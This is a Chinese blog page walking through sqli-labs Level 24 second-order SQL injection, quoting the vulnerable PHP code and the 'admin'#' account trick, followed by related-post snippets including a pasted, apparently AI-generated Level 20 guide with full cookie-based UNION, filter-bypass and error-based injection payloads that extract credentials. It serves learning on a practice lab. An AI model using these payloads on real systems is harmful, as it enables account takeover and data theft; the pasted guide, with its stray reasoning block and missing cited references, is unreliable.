sqli第24关二次注入

最新推荐文章于 2024-12-14 08:49:34 发布
原创 最新推荐文章于 2024-12-14 08:49:34 发布 · 897 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络

注入点

# Validating the user input........
	$username= $_SESSION["username"];
	$curr_pass= mysql_real_escape_string($_POST['current_password']);
	$pass= mysql_real_escape_string($_POST['password']);
	$re_pass= mysql_real_escape_string($_POST['re_password']);
	
	if($pass==$re_pass)
	{	
		$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
		$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
		$row = mysql_affected_rows();
		echo '<font size="3" color="#FFFF00">';
		echo '<center>';
		if($row==1)
		{
			echo "Password successfully updated";
	
		}
		else
		{
			header('Location: failed.php');
			//echo 'You tried to be smart, Try harder!!!! :( ';
		}
	}

$username= $_SESSION["username"];

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

对已经注册的用户的username没有转义特殊字符

思路

1,注册一个新用户admin'#虽然转义了,但特殊字符一起写进了数据库

2,用该用户更换密码,你更换的密码就是admin用户的密码 

sql语句变为

$sql = "UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass' ";

说以你去更新的是admin的密码

gchoud
关注
sqli-labs靶场-24-二次注入小应用
m0_73255659的博客
01-25 1017
其实二次注入并不难理解 ,只不过可能用的比较困难需要很多的前提条件!
二次注入——sqli-labs第24
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-02 4660
首先,选择注册 盲猜有个admin的账号,所以注册一个admin '#的账号。密码是12345 (上帝视角)此时admin的密码是admin 登录 然后为admin '#修改密码为123 修改成功(此时真的是修改admin '#的密码吗) (又一次上帝视角)此时admin的密码成了123,而admin '#的密码并没有重置 这就是二次注入: 原理就是php把…………………… sql……………… 至于为什么会有 ...
sqli-labs(24)
mmzkyl的博客
01-30 854
这个卡可能有时候会出现一些小问题,有时候登陆后是没有修改密码的选项的,这是因为有时候解压时logged-in.php文件解压不正确,重新解压即可 本卡为二次注入,其产生原因是:服务器端虽然对用户的直接输入做了一些过滤或者将一些字符进行转义,但是对于已经存入数据库的信息是完全信任的,即:不校验数据库信息是否合法 先来看看本于修改代码的部分: UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr
Sqlilabs-24
KAKA的博客
07-14 858
这一来到了二次注入的世界: 所谓的二次注入简单一句话:就是你在一个身份下面可以改其它身份的密码(数据) 不过在此之前想尝试一下报错注入在修改密码可不可以成功: ???让我更聪明更努力点??? ok,fine… 那就二次注入吧… 后台的修改密码的 SQL 语句如下: 试想,如果在注册的时候,就写入一个带过滤后边 SQL 与的字符的用户名会怎么样呢?比如:admin’# SQL 语句就变成了: UPDATE users SET PASSWORD='$pass' where username= 'admi
SQL 二阶注入 (injection 第二十四
baishiqi12的博客
08-18 573
SQL 注入,仅供参考
SQL注入sqli-labs靶场通(第十五——第二十
l258282的博客
12-14 1051
使用1 or 1=1 和 1 or 1=2发现页面正常。输入1’发现并没有报错,输入1"发现也没有报错。1'1"这次连闭合报错的信息都没有了,所以不能用报错注入了。这里可以用布尔盲注或时间盲注。
sqli-labs Less-24sqli-labs闯指南 24)—二次注入
m0_54899775的博客
12-24 1164
sqli-labs Less-24sqli-labs闯指南 24)—二次注入
SQL注入-08】二次注入案例—以sqli-labs-less24为例
m0_64378913的博客
05-06 1591
1 二次注入概述 1.1 定义 定义:在将数据(一次注入的)存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL二次注入。 例子:在第一次插入数据的时候,数据中带有单引号,直接插入到了数据库中;然后在下一次使用中在拼凑的过程中,就形成了二次注入。 1.2 思路 (1)黑客通过构造数据的形式,在浏览器或者其他软件中提交HTTP数据报文请求到服务端进行处理,提交的数据报文请求中可能包含了黑客构造的SQL语句或
sqli-labs靶场-24-二次注入小应用_sqli靶场24网络安全架构师必备框架技能核心笔记
2401_84183070的博客
04-10 800
都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
Sqli-labs Less24 二次排序注入 - POST
kevinhanser
08-10 937
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 24: POST - Second Order Injections Real treat - Stored Injections 简介 本二次排序注入的示范例。二次排序注入也成为存储型的注入,就是将可能导致 sql 注入的字符先存入到数据库中,当再次调用这个恶意构造的字符时,就可以出...
Sqli-labs less 24
weixin_34362790的博客
08-11 498
Less-24 Ps:本可能会有朋友和我遇到一样的问题,登录成功以后没有修改密码的相操作。此时造成问题的主要原因是logged-in.php文件不正确。可重新下载解压,解压过程中要主要要覆盖。 本二次排序注入的示范例。二次排序注入也成为存储型的注入,就是将可能导致sql注入的字符先存入到数据库中,当再次调用这个恶意构造的字符时,就可以出发sql注入二次排序注入思路: 1.黑...
SQL注入——sqli-labs第二十四_sqli第二十四
m0_60721695的博客
04-08 557
我们在修改密码界面正常填写我们注册的用户名 admin’# 修改密码为12345 然后我们通过断点调试查看一下 参数已经传进去了 效果如下为了方便理解我直接把admin’#输入到username方便看效果如图后面的语句就被我们注释掉了,这个时候我们改的密码就变成了管理员的密码。所以这个时候我们直接用admin作为用户名 用我们改的密码直接登录就可以直接进入管理员账户。
sqli-labs/Less-24
m0_71299382的博客
11-19 348
sqli-labs第二十四
sqli-labs:24二次注入
weixin_30414155的博客
03-24 399
二次排序注入 二次排序注入也称为存储型注入,就是将可能导致 sql 注入的字符先存入到数据库中,当再次调用这个恶意构造的字符时,就可以出发 sql 注入二次排序注入思路: 1. 黑客通过构造数据的形式,在浏览器或者其他软件中提交 HTTP 数据报文请求到服务 端进行处理,提交的数据报文请求中可能包含了黑客构造的 SQL 语句或者命令。 2. 服务端应用程序会将黑客提交的数据信息进行存...
SQL注入——sqli-labs第二十四_sqli第二十四,2024年最新震撼来袭
2401_84433535的博客
04-17 322
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
sqli--labs 进阶篇 23_24
Lucky小小吴的小屋
01-30 684
直接登录进入,通过注册一个含有特殊字符的账号,再修改密码,从而修改掉原本的数据库中已存在的账号信息。到这里,自己没有什么思路,不知道怎么注入,看了下题目讲到二阶注入,猜测我们需要在。pass_change.php 登录成功后,有更新操作的处理。源码文件,重要的只有四个,下面就依次看一下源码文件的具体功能。更新账号密码时,账户信息没有过滤,是直接更新的,可以利用!注册一个新的,账号:admin’# ,密码:123。进一步确定自己的推论,源码中,存在过滤掉一些注释语句。
sqli-labs (less23-less24)
Xi4or0uji
08-04 729
less 23 报错注入&amp;过滤注释符 这后台查询语句是select xxx form xxx where id='$_GET['id']' limit 0,1 讲道理其实跟之前的差不多的,只是对--,#这些注释的符号进行了过滤 所以最后的payload就是 ?id=-1' or extractvalue(1,concat('~',(select schema_name from...
【less-24】基于SQLI二次注入
未名编程
07-19 503
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 实验目的实验环境实验原理二次排序注入思路:实验步骤第一步 在kali平台上使用Firefox访问SQLI的less-24实验第二步 注册一个新账号第三步 以账号admin'#密码123456登录后修改密码第四步 以账号admin密码test登录成功思考与总结 实验目的 通过本实验理解SQL注入二次注入漏洞引起的原因,如何利用漏洞进行二次注入。 实验环境 渗透平台:Kali 目标网站:SQLI平台 实验原理 二次排序注.
sqli-labs第20手工注入
最新发布
04-01
<think>好的,我现在需要处理用户sqli-labs第20手工注入的问题。首先,我得回忆一下第20的具体情况。根据之前的了解,sqli-labs的不同卡设计不同的注入类型,比如GET型、POST型、报错注入、盲注等等。用户提到的是第20,所以需要确认这一注入点在哪里。 根据引用中的信息,比如引用[1]提到手工+sqlmap处理基础注入1-20,而引用[2]提到第24二次注入,引用[3]是于21、22的cookie注入。所以第20可能属于基础注入的一部分,但具体是哪种类型呢? 用户需要的是手工注入的方法,所以可能需要分析这一的输入点,比如POST参数、Cookie或HTTP头中的某个字段。比如引用[4]提到SQL注入的三个条件:参数可控、过滤不彻底、参数带入数据库执行。所以首先要确定第20注入点是否满足这三个条件。 接下来,查看引用中的资料,比如引用[5]提到第12使用双引号加小括号闭合,而第20可能使用不同的闭合方式。用户可能需要构造正确的闭合来注入。 假设第20是基于Cookie的注入,或者POST参数注入。比如引用[3]中第21需要处理Cookie并使用base64编码,但第20可能不同。需要判断注入点在哪里,比如登录后的页面,或者某个请求参数。 手工注入的一般步骤是:确定注入点、判断闭合方式、确定字段数、联合查询获取数据库信息。可能需要使用order by来确定列数,然后union select来获取数据。 另外,考虑是否有错误回显,如果存在报错信息,可以利用报错注入,如updatexml或extractvalue函数。如果无回显,可能需要时间盲注或布尔盲注。 根据引用[1]中提到的update注入,可能第17是update语句的注入,但第20可能不同,需要具体情况具体分析。 可能第20注入点在Cookie中的某个参数,比如uname,类似于引用[3]的情况,但需要构造正确的闭合。例如,如果参数被单引号包围,则需要闭合单引号并添加注入代码。 此外,需要注意过滤的情况,是否有过滤空格、注释符等,可能需要使用替换字符如/**/代替空格,或者使用括号绕过。 总结步骤可能如下: 1. 确定注入点,如Cookie中的uname参数。 2. 判断闭合方式,比如单引号、双引号等。 3. 使用order by确定列数。 4. 联合查询获取数据库名、表名、列名。 5. 提取所需数据,如用户名、密码等。 同时需要引用相的参考资料,如引用[1]、[4]、[5]来支持步骤的正确性,比如闭合方式、注入条件等。 可能遇到的问题包括闭合方式判断错误,或者字段数不匹配导致联合查询失败,这时候需要多次尝试调整。此外,如果存在WAF或过滤机制,需要绕过,比如使用注释符或编码方式。 最终,需要将步骤详细写出,并确保用户能够按照步骤进行手工注入测试。同时,生成相问题,如于其他卡的手工注入技巧、如何绕过过滤、如何利用报错注入等。</think>### sqli-labs第20手工注入方法详解 #### 1. 环境与注入点定位 **卡特性**:第20是基于Cookie的POST类型注入注入参数为`uname`,通过Cookie传递。页面功能为登录后显示用户信息,后台SQL语句可能为: $$SELECT * FROM users WHERE username='$uname' LIMIT 0,1$$[^5] **验证注入点**: - 修改Cookie中的`uname`值为`admin' --+`,若页面正常显示,说明存在单引号闭合的字符型注入[^4]。 --- #### 2. 闭合方式与注入流程 **步骤1:判断闭合方式** - 输入`admin'`触发报错,确认闭合方式为**单引号**。 - 使用注释符`--+`闭合后续语句: ```http Cookie: uname=admin' --+ ``` **步骤2:确定字段数** - 通过`ORDER BY`逐次增加列数测试: ```http Cookie: uname=admin' ORDER BY 3 --+ ``` 当`ORDER BY 4`报错时,字段数为**3**。 **步骤3:联合查询获取数据** - 构造`UNION SELECT`语句,需匹配字段数: ```http Cookie: uname=admin' UNION SELECT 1,2,3 --+ ``` 页面会显示回显位(如`2`和`3`)。 **步骤4:提取数据库信息** - 获取当前数据库名和用户: ```http Cookie: uname=admin' UNION SELECT 1,database(),user() --+ ``` 回显结果示例:`security` / `root@localhost`。 **步骤5:爆破表名与列名** - 查询`security`数据库的表名: ```http Cookie: uname=admin' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database() --+ ``` 结果示例:`emails,referers,uagents,users`。 - 查询`users`表的列名: ```http Cookie: uname=admin' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users' --+ ``` 结果示例:`id,username,password`。 **步骤6:提取敏感数据** - 最终获取用户密码: ```http Cookie: uname=admin' UNION SELECT 1,group_concat(username,0x3a,password),3 FROM users --+ ``` 输出示例:`admin:admin123`。 --- #### 3. 键绕过技巧 1. **空格过滤**:使用`/**/`代替空格,如`UNION/**/SELECT`。 2. **引号限制**:利用`HEX编码`或`CHAR()`函数,例如`table_name=0x7573657273`(即`users`的HEX值)。 3. **报错注入**(可选): ```http Cookie: uname=admin' AND updatexml(1,concat(0x7e,user()),1) --+ ``` 通过报错信息直接提取数据[^1]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值